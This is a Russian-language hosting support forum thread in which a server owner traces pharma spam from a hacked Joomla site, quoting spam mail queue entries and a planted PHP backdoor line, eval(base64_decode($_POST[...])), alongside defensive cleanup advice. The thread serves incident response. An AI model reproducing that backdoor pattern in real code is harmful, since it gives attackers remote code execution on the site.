Страница 1 из 1

php mail header

СообщениеДобавлено: Ср янв 28, 2015 12:48 pm
WolfHunter
Люди добрые!
Помогите пожалуйста поставить патч php mail header.
Centos-6-amd64-ispmgr5


mail.add_x_header = On
mail.log = "/var/tmp/php.mail.log"
не помогает

P.S. в очереди есть письма без заголовков:

1YFtND-0003tF-Cr-D

<p><h1>Your Liable Medicines Supplies save time and money - <a href="http://lorettacella.com/wp-includes/js/tinymce/themes/advanced/skins/config.html">visit our site</a></h1></p>


а есть вот такая хрень:
1YFrAf-0006W4-RF-H
sashka 502 502
<elena_larson@rdv-spb.ru>
1422307569 0
-ident sashka
-received_protocol local
-aclc 9 12
elena_larson
-aclc 8 0

-body_linecount 3
-max_received_linelength 182
-allow_unqualified_recipient
-allow_unqualified_sender
XX
1
andiaka_ferry@rocketmail.com

198P Received: from sashka by wolfhunter.fvds.ru with local (Exim 4.72)
(envelope-from <elena_larson@rdv-spb.ru>)
id 1YFrAf-0006W4-RF
for andiaka_ferry@rocketmail.com; Tue, 27 Jan 2015 01:26:09 +0400
038 Date: Tue, 27 Jan 2015 01:26:09 +0400
051I Message-Id: <E1YFrAf-0006W4-RF@wolfhunter.fvds.ru>
033T To: andiaka_ferry@rocketmail.com
037 Subject: Fw: Superb Pharma Products
042 X-PHP-Originating-Script: 502:include.php
047F From: "Elena Larson" <elena_larson@rdv-spb.ru>
050R Reply-To:"Elena Larson" <elena_larson@rdv-spb.ru>
023 X-Priority: 3 (Normal)
018 MIME-Version: 1.0
046 Content-Type: text/html; charset="iso-8859-1"
032 Content-Transfer-Encoding: 8bit

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 2:29 pm
ls
Вам надо пересобрать PHP с этим модулем, вообще насколько вижу модуль есть, только не работает

X-PHP-Originating-Script: 502:include.php

ищите все скрипты include.php на сайте

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 2:44 pm
WolfHunter
какой-то нехороший тип, понатыкал в файлах:
eval(base64_decode($_POST['nfd5793']));

умучился тереть

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 3:20 pm
pepper
Совет: При нахождении подобных включений в код стоит посмотреть даты изменения файлов командой stat, перед тем, как исправлять код.
Это может помочь в поиске уязвимости, через которую поменяли ваш код.
Потом время Modify (или Change) из вывода stat стоит проверить на наличие в журналах доступа к сайтам и журналов ftp (xferlog).

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 3:33 pm
WolfHunter
изменения были летом. так что с логами проблема

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 3:42 pm
pepper
Если бэкапы восстановить на время до заражения не вариант, тогда вычищайте код, ставьте правильные права на директории/файлы и проверяйте скриптами периодически на наличие вредоносных включений /изменения в файлах.

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 6:01 pm
ls
> mail.add_x_header = On
> mail.log = "/var/tmp/php.mail.log"

А вы где это прописываете?
Я проверил - все работает на данном шаблоне если скрипт шлет функцией mail - mail ("user@example.com","subj","text");
Добавил в /etc/php.ini и перезапустил apache командой apachectl restart - файл создался и пишется в него отправка каким скриптом и куда отправлено

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 7:21 pm
WolfHunter
извините что ввел в заблуждение. я имел ввиду что по логам не найти зловредные включения в файлы. Получается что они не используют mail(). А что тогда? спам то идёт! smtp? :-о

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 7:41 pm
pepper
>> я имел ввиду что по логам не найти зловредные включения в файлы
По логам вы могли найти путь взлома и заливки файлов.
Включения зловредные ищутся скриптами, grep-ом и после вручную.

Во-первых, остановите почтовый сервер, чтоб не компрометировать дальше свой IP, во-вторых, очистите почтовую очередь, чтобы исключить старый спам.
Теперь можно включить почтовик и понаблюдать за его журналами.
Если спам всё же есть, снова остановите почтовик и ищите включения скриптами.

Если сами не справитесь, - первый раз очистка при купленном "Администрировании" проводится за 1 инцидент.

Re: php mail header

СообщениеДобавлено: Ср янв 28, 2015 8:42 pm
WolfHunter
по логам(/var/tmp/php.mail.log) последнее письмо отправлено 23 января(бот слал через стандартную форму joomla), хотя спам льётся каждый день.

За совет спасибо! Сейчас всё проверяю ai-bolit`ом
включений хоть жопой ешь(извините). меняю все пароли

Re: php mail header

СообщениеДобавлено: Чт янв 29, 2015 4:00 am
ls